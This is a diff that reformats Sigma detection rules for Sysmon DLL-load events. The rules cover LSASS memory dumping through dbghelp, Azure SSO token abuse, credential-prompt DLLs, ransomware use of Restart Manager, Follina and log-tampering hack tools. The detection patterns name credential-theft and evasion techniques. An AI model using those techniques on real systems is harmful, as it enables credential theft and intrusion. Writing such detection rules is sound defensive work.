a/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml @@ -1,14 +1,9 @@ title: Potential Azure Browser SSO Abuse id: 50f852e6-af22-4c78-9ede-42ef36aa3453 status: test -description: 'Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens - for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure - AD and a user logs in with their Azure AD account) wanting to perform SSO authentication - in the browser. - +description: | + Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user. - - ' references: - https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30 author: Den Iuzvyk @@ -33,6 +28,7 @@ detection: - C:\Windows\System32\ - C:\Windows\SysWOW64\ Image|endswith: \BackgroundTaskHost.exe + # CommandLine|contains: '-ServerNameBackgroundTaskHost.WebAccountProvider' filter_optional_devenv: Image|startswith: - C:\Program Files\Microsoft Visual Studio\ @@ -43,11 +39,11 @@ detection: - C:\Program Files (x86)\Internet Explorer\iexplore.exe - C:\Program Files\Internet Explorer\iexplore.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -58,10 +54,9 @@ detection: filter_optional_onedrive: Image|endswith: \AppData\Local\Microsoft\OneDrive\OneDrive.exe filter_optional_null: - Image: null + Image: condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - False positives are expected since this rules is only looking for the DLL load - event. This rule is better used in correlation with related activity + - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity level: low ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml b/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml index f1b0e8fc1..1212e9658 100644 --- a/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml +++ b/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml @@ -22,11 +22,12 @@ detection: selection: Image|endswith: \rundll32.exe Hashes|contains: - - IMPHASH=eed93054cb555f3de70eaa9787f32ebb - - IMPHASH=5e0dbdec1fce52daae251a110b4f309d - - IMPHASH=eadbccbb324829acb5f2bbe87e5549a8 - - IMPHASH=407ca0f7b523319d758a40d7c0193699 - - IMPHASH=281d618f4e6271e527e6386ea6f748de + # Add more hashes for other windows versions + - IMPHASH=eed93054cb555f3de70eaa9787f32ebb # Windows 11 21H2 x64 + - IMPHASH=5e0dbdec1fce52daae251a110b4f309d # Windows 10 1607 + - IMPHASH=eadbccbb324829acb5f2bbe87e5549a8 # Windows 10 1809 + - IMPHASH=407ca0f7b523319d758a40d7c0193699 # Windows 10 2004 x64 + - IMPHASH=281d618f4e6271e527e6386ea6f748de # Windows 10 2004 x86 filter: ImageLoaded|endswith: \comsvcs.dll condition: image_load and (selection and not filter) diff --git a/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml b/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml index c9c186f88..6cf487d55 100644 --- a/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml @@ -1,9 +1,7 @@ title: CredUI.DLL Loaded By Uncommon Process id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 status: experimental -description: Detects loading of "credui.dll" and related DLLs by an uncommon process. - Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" - or "CredUnPackAuthenticationBufferW". +description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". references: - https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password @@ -25,12 +23,12 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImageLoaded|endswith: - - \credui.dll - - \wincredui.dll - - OriginalFileName: - - credui.dll - - wincredui.dll + - ImageLoaded|endswith: + - \credui.dll + - \wincredui.dll + - OriginalFileName: + - credui.dll + - wincredui.dll filter_main_generic: Image|startswith: - C:\Program Files (x86)\ @@ -41,7 +39,7 @@ detection: Image: - C:\Windows\explorer.exe - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - C:\Windows\regedit.exe + - C:\Windows\regedit.exe # This FP is triggered for example when choosing the "Connect Network Registry" from the menu filter_optional_opera: Image|endswith: \opera_autoupdate.exe filter_optional_process_explorer: diff --git a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml index e1854ae8b..562a0f34e 100644 --- a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml @@ -1,20 +1,13 @@ title: Load Of Dbghelp/Dbgcore DLL From Suspicious Process id: 0e277796-5f23-4e49-a490-483131d4f6e1 related: - - id: bdc64095-d59a-42a2-8588-71fd9c9d9abc - type: similar + - id: bdc64095-d59a-42a2-8588-71fd9c9d9abc # Unsigned Loading + type: similar status: test -description: 'Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) - by suspicious processes. - - Tools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API - found in dbghelp.dll or dbgcore.dll. - - As an example, SilentTrynity C2 Framework has a module that leverages this API - to dump the contents of Lsass.exe and transfer it over the network back to the - attacker''s machine. - - ' +description: | + Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. + Tools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. + As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. references: - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html @@ -40,24 +33,30 @@ detection: Image|endswith: - \msbuild.exe - \cmd.exe + # - '\svchost.exe' triggered by installing common software - \rundll32.exe + # - '\powershell.exe' triggered by installing common software - \winword.exe - \excel.exe - \powerpnt.exe - \outlook.exe - \monitoringhost.exe - \wmic.exe + # - '\msiexec.exe' an installer installing a program using one of those DLL will raise an alert - \bash.exe - \wscript.exe - \cscript.exe - \mshta.exe + # - '\regsvr32.exe' triggered by installing common software + # - '\schtasks.exe' triggered by installing software - \dnx.exe - \regsvcs.exe - \sc.exe - \scriptrunner.exe filter_tiworker: - CommandLine|startswith: C:\WINDOWS\winsxs\ - CommandLine|endswith: \TiWorker.exe -Embedding + # CommandLine field added by aurora + CommandLine|startswith: C:\WINDOWS\winsxs\ + CommandLine|endswith: \TiWorker.exe -Embedding condition: image_load and (selection and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml index 6a89ac7c9..f2bf7ed63 100644 --- a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml @@ -1,20 +1,13 @@ title: Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded id: bdc64095-d59a-42a2-8588-71fd9c9d9abc related: - - id: 0e277796-5f23-4e49-a490-483131d4f6e1 - type: similar + - id: 0e277796-5f23-4e49-a490-483131d4f6e1 # Suspicious Loading + type: similar status: test -description: 'Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) - by suspicious processes. - - Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API - found in dbghelp.dll or dbgcore.dll. - - As an example, SilentTrynity C2 Framework has a module that leverages this API - to dump the contents of Lsass.exe and transfer it over the network back to the - attacker''s machine. - - ' +description: | + Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. + Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. + As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. references: - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html diff --git a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml index 93351147b..7b086fc72 100644 --- a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml @@ -1,24 +1,19 @@ title: Load Of RstrtMgr.DLL By A Suspicious Process id: b48492dc-c5ef-4572-8dff-32bc241c15c8 related: - - id: 3669afd2-9891-4534-a626-e5cf03810a61 - type: derived + - id: 3669afd2-9891-4534-a626-e5cf03810a61 + type: derived status: experimental -description: 'Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. - - This library has been used during ransomware campaigns to kill processes that - would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). - It has also recently been seen used by the BiBi wiper for Windows. - +description: | + Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. + This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes. - - ' references: - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/ - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/ - https://www.swascan.com/cactus-ransomware-malware-analysis/ - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html -author: "Luc G\xE9naux" +author: Luc Génaux date: 2023/11/28 tags: - attack.impact @@ -34,23 +29,24 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - ImageLoaded|endswith: \RstrtMgr.dll - - OriginalFileName: RstrtMgr.dll + - ImageLoaded|endswith: \RstrtMgr.dll + - OriginalFileName: RstrtMgr.dll selection_folders_1: Image|contains: + # Note: increase coverage by adding more suspicious paths - :\Perflogs\ - :\Users\Public\ - \Temporary Internet selection_folders_2: - - Image|contains|all: - - :\Users\ - - \Favorites\ - - Image|contains|all: - - :\Users\ - - \Favourites\ - - Image|contains|all: - - :\Users\ - - \Contacts\ + - Image|contains|all: + - :\Users\ + - \Favorites\ + - Image|contains|all: + - :\Users\ + - \Favourites\ + - Image|contains|all: + - :\Users\ + - \Contacts\ condition: image_load and (selection_img and 1 of selection_folders_*) falsepositives: - Processes related to software installation diff --git a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml index f517e71f2..6fa7e24d3 100644 --- a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml @@ -1,24 +1,19 @@ title: Load Of RstrtMgr.DLL By An Uncommon Process id: 3669afd2-9891-4534-a626-e5cf03810a61 related: - - id: b48492dc-c5ef-4572-8dff-32bc241c15c8 - type: derived + - id: b48492dc-c5ef-4572-8dff-32bc241c15c8 + type: derived status: experimental -description: 'Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. - - This library has been used during ransomware campaigns to kill processes that - would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). - It has also recently been seen used by the BiBi wiper for Windows. - +description: | + Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. + This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes. - - ' references: - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/ - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/ - https://www.swascan.com/cactus-ransomware-malware-analysis/ - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html -author: "Luc G\xE9naux" +author: Luc Génaux date: 2023/11/28 tags: - attack.impact @@ -34,8 +29,8 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImageLoaded|endswith: \RstrtMgr.dll - - OriginalFileName: RstrtMgr.dll + - ImageLoaded|endswith: \RstrtMgr.dll + - OriginalFileName: RstrtMgr.dll filter_main_generic: Image|contains: - :\$WINDOWS.~BT\ diff --git a/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml b/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml index 917b341c5..b0fec4333 100644 --- a/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml +++ b/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml @@ -1,8 +1,7 @@ title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE id: ec8c4047-fad9-416a-8c81-0f479353d7f6 status: test -description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities - exploiting msdt.exe binary to load the "sdiageng.dll" library +description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library references: - https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/ author: Greg (rule) diff --git a/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml index f0dcbd1ce..1bd101add 100644 --- a/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml @@ -1,19 +1,16 @@ title: PowerShell Core DLL Loaded By Non PowerShell Process id: 092bc4b9-3d1d-43b4-a6b4-8c8acd83522f related: - - id: 867613fb-fa60-4497-a017-a82df74a172c - type: obsoletes - - id: fe6e002f-f244-4278-9263-20e4b593827f - type: obsoletes + - id: 867613fb-fa60-4497-a017-a82df74a172c + type: obsoletes + - id: fe6e002f-f244-4278-9263-20e4b593827f + type: obsoletes status: experimental -description: Detects loading of essential DLLs used by PowerShell, but not by the - process powershell.exe. Detects behaviour similar to meterpreter's "load powershell" - extension. +description: Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's "load powershell" extension. references: - https://adsecurity.org/?p=2921 - https://github.com/p3nt4/PowerShdll -author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez - (Cyb3rWard0g), OTR (Open Threat Research) +author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2019/11/14 modified: 2023/05/31 tags: @@ -28,14 +25,14 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: System.Management.Automation - - OriginalFileName: System.Management.Automation.dll - - ImageLoaded|endswith: - - \System.Management.Automation.dll - - \System.Management.Automation.ni.dll + - Description: System.Management.Automation + - OriginalFileName: System.Management.Automation.dll + - ImageLoaded|endswith: + - \System.Management.Automation.dll + - \System.Management.Automation.ni.dll filter_main_generic: Image|endswith: - - :\Program Files\PowerShell\7\pwsh.exe + - :\Program Files\PowerShell\7\pwsh.exe # PowerShell 7 - :\Windows\System32\dsac.exe - :\WINDOWS\System32\RemoteFXvGPUDisablement.exe - :\Windows\System32\runscripthelper.exe @@ -76,8 +73,10 @@ detection: Image|endswith: - \thor64.exe - \thor.exe + # User: 'NT AUTHORITY\SYSTEM' # if set, matches all powershell processes not launched by SYSTEM filter_optional_aurora: - Image: null + # This filter is to avoid a race condition FP with this specific ETW provider in aurora + Image: condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Used by some .NET binaries, minimal on user workstation. diff --git a/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml b/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml index bf611dc86..739ecdbcd 100644 --- a/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml @@ -1,13 +1,12 @@ title: Time Travel Debugging Utility Usage - Image id: e76c8240-d68f-4773-8880-5c6f63595aaf status: test -description: Detects usage of Time Travel Debugging Utility. Adversaries can execute - malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ - https://twitter.com/mattifestation/status/1196390321783025666 - https://twitter.com/oulusoyum/status/1191329746069655553 -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/06 modified: 2022/12/02 tags: diff --git a/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml index 9b8156ebe..6e569ebcf 100644 --- a/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml @@ -1,10 +1,10 @@ title: Suspicious Volume Shadow Copy VSS_PS.dll Load id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 related: - - id: 48bfd177-7cf2-412b-ad77-baf923489e82 - type: similar - - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 - type: similar + - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll + type: similar + - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll + type: similar status: experimental description: Detects the image load of vss_ps.dll by uncommon executables references: @@ -48,14 +48,15 @@ detection: - \WmiPrvSE.exe - \System32\SystemPropertiesAdvanced.exe filter_programfiles: + # When using this rule in your environment replace the "Program Files" folder by the exact applications you know use this. Examples would be software such as backup solutions Image|startswith: - C:\Program Files\ - C:\Program Files (x86)\ filter_update: - CommandLine|startswith: C:\$WinREAgent\Scratch\ - CommandLine|contains: \dismhost.exe { + CommandLine|startswith: C:\$WinREAgent\Scratch\ + CommandLine|contains: \dismhost.exe { filter_image_null: - Image: null + Image: condition: image_load and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml index 80e093dc2..05c58888d 100644 --- a/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml @@ -1,10 +1,10 @@ title: Suspicious Volume Shadow Copy Vssapi.dll Load id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 related: - - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 - type: similar - - id: 48bfd177-7cf2-412b-ad77-baf923489e82 - type: similar + - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll + type: similar + - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll + type: similar status: experimental description: Detects the image load of VSS DLL by uncommon executables references: @@ -27,19 +27,26 @@ detection: selection: ImageLoaded|endswith: \vssapi.dll filter_windows: - - Image: - - C:\Windows\explorer.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\Temp\{ - - C:\Windows\WinSxS\ + - Image: + - C:\Windows\explorer.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\Temp\{ # Installers + - C:\Windows\WinSxS\ filter_program_files: + # When using this rule in your environment replace the "Program Files" folder by the exact applications you know use this. Examples would be software such as backup solutions Image|startswith: - C:\Program Files\ - C:\Program Files (x86)\ filter_programdata_packagecache: + # The following filter is required because of many FPs cause by: + # C:\ProgramData\Package Cache\{10c6cfdc-27af-43fe-bbd3-bd20aae88451}\dotnet-sdk-3.1.425-win-x64.exe + # C:\ProgramData\Package Cache\{b9cfa33e-ace4-49f4-8bb4-82ded940990a}\windowsdesktop-runtime-6.0.11-win-x86.exe + # C:\ProgramData\Package Cache\{50264ff2-ad47-4569-abc4-1c350f285fb9}\aspnetcore-runtime-6.0.11-win-x86.exe + # C:\ProgramData\Package Cache\{2dcef8c3-1563-4149-a6ec-5b6c98500d7d}\dotnet-sdk-6.0.306-win-x64.exe + # etc. Image|startswith: C:\ProgramData\Package Cache\ condition: image_load and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml index 6ea9182c0..9df931355 100644 --- a/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml @@ -1,10 +1,10 @@ title: Suspicious Volume Shadow Copy Vsstrace.dll Load id: 48bfd177-7cf2-412b-ad77-baf923489e82 related: - - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 - type: similar - - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 - type: similar + - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll + type: similar + - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll + type: similar status: experimental description: Detects the image load of VSS DLL by uncommon executables references: @@ -27,15 +27,16 @@ detection: selection: ImageLoaded|endswith: \vsstrace.dll filter_windows: - - Image: - - C:\Windows\explorer.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\Temp\{ - - C:\Windows\WinSxS\ + - Image: + - C:\Windows\explorer.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\Temp\{ # Installers + - C:\Windows\WinSxS\ filter_program_files: + # When using this rule in your environment replace the "Program Files" folder by the exact applications you know use this. Examples would be software such as backup solutions Image|startswith: - C:\Program Files\ - C:\Program Files (x86)\ diff --git a/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml b/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml index e9ac2c50a..db7dd822f 100644 --- a/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml +++ b/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml @@ -1,11 +1,10 @@ title: HackTool - SharpEvtMute DLL Load id: 49329257-089d-46e6-af37-4afce4290685 related: - - id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c - type: similar + - id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c # Process Creation + type: similar status: test -description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, - a tool that tampers with the Windows event logs +description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs references: - https://github.com/bats3c/EvtMute author: Florian Roth (Nextron Systems) @@ -23,8 +22,8 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Hashes|contains: IMPHASH=330768A4F172E10ACB6287B87289D83B - - Imphash: 330768a4f172e10acb6287b87289d83b + - Hashes|contains: IMPHASH=330768A4F172E10ACB6287B87289D83B + - Imphash: 330768a4f172e10acb6287b87289d83b condition: image_load and selection falsepositives: - Other DLLs with the same Imphash diff --git a/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml b/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml index 79173a521..17ff96d67 100644 --- a/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml +++ b/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml @@ -1,8 +1,8 @@ title: HackTool - SILENTTRINITY Stager DLL Load id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d related: - - id: 03552375-cc2c-4883-bbe4-7958d5a980be - type: derived + - id: 03552375-cc2c-4883-bbe4-7958d5a980be # Process Creation + type: derived status: test description: Detects SILENTTRINITY stager dll loading activity references: diff --git a/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml b/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml index dc39d273d..f4c0be963 100644 --- a/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml +++ b/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml @@ -1,13 +1,12 @@ title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load id: f354eba5-623b-450f-b073-0b5b2773b6aa related: - - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 - type: obsoletes - - id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa - type: similar + - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 + type: obsoletes + - id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa + type: similar status: test -description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application - Class +description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga diff --git a/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml index d07e9eb8f..7c70f6693 100644 --- a/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml index 7ab4b74cd..e74caac3d 100644 --- a/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml @@ -24,7 +24,7 @@ detection: - \mspub.exe - \outlook.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \powerpnt.exe - \winword.exe ImageLoaded|contains: \clr.dll diff --git a/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml index b4e3fa817..379f80a0f 100644 --- a/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml index 5d2cef86c..b001206d9 100644 --- a/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml b/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml index de2a4656b..280dd650b 100644 --- a/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml @@ -1,11 +1,10 @@ title: Microsoft Excel Add-In Loaded From Uncommon Location id: af4c4609-5755-42fe-8075-4effb49f5d44 related: - - id: c5f4b5cb-4c25-4249-ba91-aa03626e3185 - type: derived + - id: c5f4b5cb-4c25-4249-ba91-aa03626e3185 + type: derived status: experimental -description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon - location +description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location references: - 